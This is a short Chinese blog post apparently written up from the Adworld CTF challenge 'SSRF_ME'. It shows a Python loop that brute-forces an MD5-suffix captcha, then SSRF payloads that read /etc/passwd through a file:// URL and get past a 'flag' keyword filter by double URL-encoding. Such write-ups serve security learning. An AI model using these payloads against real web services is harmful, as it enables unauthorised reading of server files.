攻防世界SSRF_ME

首先看一下md5截断:

substr(md5(captcha), -6, 6) == "4c3d26",表示从字符串倒数第6位开始,往后截取6位
captcha是验证码的意思,一般是数字,所以可以直接爆破数字
import hashlib
for i in range(1000000):
    if hashlib.md5(str(i).encode()).hexdigest().endswith('15f494'):
        print(i)

 

对于url参数,传file:///etc/passwd有回显,传file:///flag被拦截,很明显是过滤了flag关键字,我看WP里面写的都是url编码绕过,我感觉他们说的应该是URL16进制加密编码,在线工具

传参?url=file:///%66%6c%61%67还是会被拦截,把%再加密一下变成%25,传参?url=file:///%2566%6c%61%67,或者加密任何一个数字或字母也行。

 

 

posted @ 2023-07-17 23:41  Galio  阅读(191)  评论(0编辑  收藏  举报